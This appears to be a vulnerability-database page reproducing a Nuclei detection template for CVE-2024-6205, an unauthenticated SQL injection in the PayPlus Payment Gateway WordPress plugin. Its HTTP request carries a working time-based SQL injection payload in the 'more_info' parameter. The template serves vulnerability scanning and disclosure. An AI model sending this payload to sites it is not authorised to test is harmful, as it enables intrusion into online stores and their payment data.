Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2024-6205
HistoryJul 19, 2024 - 6:36 p.m.

PayPlus Payment Gateway < 6.6.9 - SQL Injection

2024-07-1918:36:26
ProjectDiscovery
github.com
20
wpscan
cve2024
sqli
wordpress
wp-plugin
payplus-payment

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

7.5

Confidence

High

The PayPlus Payment Gateway WordPress plugin before 6.6.9 does not properly sanitise and escape a parameter before using it in a SQL statement via a WooCommerce API route available to unauthenticated users, leading to an SQL injection vulnerability.
id: CVE-2024-6205

info:
  name: PayPlus Payment Gateway < 6.6.9 - SQL Injection
  author: securityforeveryone
  severity: critical
  description: |
    The PayPlus Payment Gateway WordPress plugin before 6.6.9 does not properly sanitise and escape a parameter before using it in a SQL statement via a WooCommerce API route available to unauthenticated users, leading to an SQL injection vulnerability.
  remediation: Fixed in 6.6.9
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/payplus-payment-gateway/payplus-payment-gateway-668-unauthenticated-sql-injection
    - https://wpscan.com/vulnerability/7e2c5032-2917-418c-aee3-092bdb78a087
    - https://nvd.nist.gov/vuln/detail/CVE-2024-6205
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-6205
    cwe-id: CWE-89
    epss-score: 0.00043
    epss-percentile: 0.09301
  metadata:
    max-request: 1
    vendor: payplus-ltd
    product: payplus-payment-gateway
    framework: wordpress
    publicwww-query: "/wp-content/plugins/payplus-payment-gateway"
  tags: wpscan,cve,cve2024,sqli,wordpress,wp-plugin,wp,payplus-payment

http:
  - raw:
      - |
        @timeout 20s
        GET /?wc-api=payplus_gateway&status_code=true&more_info=(select*from(select(sleep(6)))a) HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'duration>=6'
          - 'status_code == 302'
          - "regex('^-1$', body)"
          - 'contains(content_type,"text/html")'
        condition: and
# digest: 4a0a00473045022100f111a9b235cd1beced5bdee2a525448fa0cbe1fdd412e6aa9504086a610188160220594702f19ed51d04265a15c1a4fdb984964da0b4aa02ba183010395bdfac2c75:922c64590222798bb761d5b6d8e72950

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

7.5

Confidence

High